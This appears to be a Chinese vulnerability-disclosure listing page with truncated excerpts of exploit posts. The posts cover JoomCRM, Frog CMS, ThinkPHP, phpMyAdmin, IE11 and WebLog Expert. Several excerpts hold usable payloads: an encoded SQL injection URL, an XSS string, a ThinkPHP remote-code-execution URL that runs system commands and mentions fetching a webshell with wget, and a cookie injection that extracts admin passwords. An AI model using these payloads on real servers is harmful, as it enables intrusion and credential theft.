• Joomla JoomCRM 1.1.1注入漏洞

    Joomla JoomCRM 1.1.1注入漏洞
    # POC: # http://localhost/[PATH]/index.php?option=com_joomcrm&view=contacts&format=raw&loc=deal&tmpl=component&deal_id=[SQL] # GET /[PATH]/index.php?option=com_joomcrm&view=contacts&format=raw&loc=deal&tmpl=component&deal_id=31%39%20A%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52OM%2...阅读全文
    作者:hedysx | 分类:漏洞公布 | 阅读:27次 | 标签:
  • Frog CMS 0.9.5跨站漏洞

    Frog CMS 0.9.5跨站漏洞
    # Version:0.9.5 # CVE :CVE-2018-20448 # The parameter under /install/index.php is that the Database name has reflective XSS # 1 The Database name , username and password must be correct # 2 You can use the exp: <script>alert(1)</script> 阅读全文
    作者:hedysx | 分类:漏洞公布 | 阅读:55次 | 标签:
  • thinkphp v5.x 远程代码执行漏洞poc

    thinkphp v5.x 远程代码执行漏洞poc
    20181216补充: 1.执行phpinfo http://unhonker.com/public/index.php?s=/index/\think\app/invokefunction&amp;amp;amp;amp;function=call_user_func_array&amp;amp;amp;amp;vars[0]=system&amp;amp;amp;amp;vars[1][]=php%20-r%20'phpinfo();' 2. 利用该漏洞远程执行下载命令,通过wget远程下载一个webshell后门,执行命令从而获得服务器权限。 其攻击URI详情如下: /admin....阅读全文
    作者:hedysx | 分类:漏洞公布 | 阅读:188次 | 标签:
  • phpMyAdmin 4.8.1本地文件包含漏洞

    phpMyAdmin 4.8.1本地文件包含漏洞
    CVE-2018-12613 # 1. Description: # An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, ...阅读全文
    作者:hedysx | 分类:漏洞公布 | 阅读:182次 | 标签:
  • IE11 Null Pointer Difference

    IE11 Null Pointer Difference
    # Date: 2018-11-03 # Vendor: Microsoft Corporation # Product web page: https://www.microsoft.com # Affected version: 11.345.17134.0 (Update Versions: 11.0.90 (KB4462949)) # 11.1387.15063.0 (Update Versions: 11.0.90 (KB4462949)) # 11.0.9600.18282 (Update Versions: 11.0.30 (KB3148198)) # 11.0.9600.178...阅读全文
    作者:hedysx | 分类:漏洞公布 | 阅读:252次 | 标签:
  • WebLog Expert Enterprise 9.4 权限提升漏洞

    WebLog Expert Enterprise 9.4 权限提升漏洞
    Software Link: https://www.weblogexpert.com/download.htm Exploit: 1. Login as regular user where WebLog Expert and WebLog Expert Schedule Service are installed 2. Open WebLog Expert and then Schedule 3. Select Add, Next, choose ‘Sample – HTML’ under Profile, Next 4. Check ‘Run command…’ box, fill in ‘Command’ and...阅读全文
    作者:hedysx | 分类:漏洞公布 | 阅读:3,887次 | 标签:
  • Joomla内核SQL注入漏洞(CVE-2018-8045)分析

    Joomla内核SQL注入漏洞(CVE-2018-8045)分析
    我们先看下joomla官网怎么说的: https://developer.joomla.org/security-centre/723-20180301-core-sqli-vulnerability.html User Notes模块由于缺少变量类型转换,导致sql注入的产生。这个漏洞在3.8.6版本被解决。 漏洞介绍很模糊,单从介绍来看,根本不知道这个sql注入产生的位置。 但是既然是3.8.6版本解决的,那我们就来从3.8.6版本的update包中找找思路。 如下是github上joomla的rel...阅读全文
    作者:hedysx | 分类:漏洞公布 | 阅读:700次 | 标签:
  • thinkphp3.2.3注入漏洞

    thinkphp3.2.3注入漏洞
    这个漏洞是基于thinkphp3.2.3开发引起的。 漏洞一 由于oauth_reg方法中调用了login来验证当前会员是否登陆,所以咱们需要注册一个会员帐户再利用该漏洞,这里玩注册用户名和密码均为test123的帐户,然后构造如下cookie: members_bind_info[keyid][0]=exp; members_bind_info[keyid][1]==1 or updatexml(0,concat(0xa,(SELECT password FROM xx_admin limit 1)),0)%23 members_bind_info[...阅读全文
    作者:hedysx | 分类:漏洞公布 | 阅读:1,964次 | 标签: